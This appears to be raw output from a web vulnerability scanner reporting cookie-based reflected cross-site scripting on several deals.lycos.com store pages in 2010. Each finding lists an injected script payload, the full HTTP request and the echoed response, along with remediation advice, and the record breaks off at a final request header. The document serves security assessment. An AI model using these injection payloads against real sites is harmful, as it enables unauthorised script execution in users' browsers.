HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47006
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/best-buy-560&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd064"><script>alert(1)</script>f8d80f801a2&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3978b"%3balert(1)//cc36d6b749a was submitted in the diktfc cookie. This input was echoed as 3978b";alert(1)//cc36d6b749a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/best-buy-560 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3978b"%3balert(1)//cc36d6b749a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:38 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:38 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47061
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2630"%3balert(1)//4cb7f0b56a was submitted in the diktfc cookie. This input was echoed as d2630";alert(1)//4cb7f0b56a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/buy-com-233 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad2630"%3balert(1)//4cb7f0b56a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:56 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46839
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f2c"><script>alert(1)</script>8b3b9fa5add was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/buy-com-233 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A94f2c"><script>alert(1)</script>8b3b9fa5add; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:54 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46873
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/buy-com-233&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A94f2c"><script>alert(1)</script>8b3b9fa5add&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd3f3"><script>alert(1)</script>6d94b7cd86b was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/dell-home-638 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd3f3"><script>alert(1)</script>6d94b7cd86b; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46898
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/dell-home-638&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd3f3"><script>alert(1)</script>6d94b7cd86b&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efe09"%3balert(1)//d150acaf4db was submitted in the diktfc cookie. This input was echoed as efe09";alert(1)//d150acaf4db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/dell-home-638 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aefe09"%3balert(1)//d150acaf4db; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46751
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55a88"><script>alert(1)</script>0fb01bfaa85 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/ebay-50 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55a88"><script>alert(1)</script>0fb01bfaa85; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:34 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:34 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47762
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/ebay-50&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A55a88"><script>alert(1)</script>0fb01bfaa85&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 317e4"%3balert(1)//c8dbb3e8531 was submitted in the diktfc cookie. This input was echoed as 317e4";alert(1)//c8dbb3e8531 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/ebay-50 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A317e4"%3balert(1)//c8dbb3e8531; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:36 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47597
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0001"%3balert(1)//e061132f52f was submitted in the diktfc cookie. This input was echoed as a0001";alert(1)//e061132f52f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/itunes-music-store-1414 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0001"%3balert(1)//e061132f52f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44807
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef1"><script>alert(1)</script>ba52086b4b8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/itunes-music-store-1414 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaaef1"><script>alert(1)</script>ba52086b4b8; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44954
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/itunes-music-store-1414&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaaef1"><script>alert(1)</script>ba52086b4b8&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f34a"><script>alert(1)</script>05c0ac4a695 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/jcpenney-320 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f34a"><script>alert(1)</script>05c0ac4a695; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:33 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43101
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/jcpenney-320&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f34a"><script>alert(1)</script>05c0ac4a695&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfcf4"%3balert(1)//5e595d1d45 was submitted in the diktfc cookie. This input was echoed as cfcf4";alert(1)//5e595d1d45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/jcpenney-320 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Acfcf4"%3balert(1)//5e595d1d45; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43049
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d946"><script>alert(1)</script>30c7b4c6229 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deals/stores/kohls-1009 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d946"><script>alert(1)</script>30c7b4c6229; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:13 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22195
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deals/stores/kohls-1009&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5d946"><script>alert(1)</script>30c7b4c6229&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eb51"%3balert(1)//dcef7041eb3 was submitted in the diktfc cookie. This input was echoed as 7eb51";alert(1)//dcef7041eb3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deals/stores/kohls-1009 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7eb51"%3balert(1)//dcef7041eb3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22245
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c81"%3balert(1)//0b0bfcb7a69 was submitted in the diktfc cookie. This input was echoed as 34c81";alert(1)//0b0bfcb7a69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
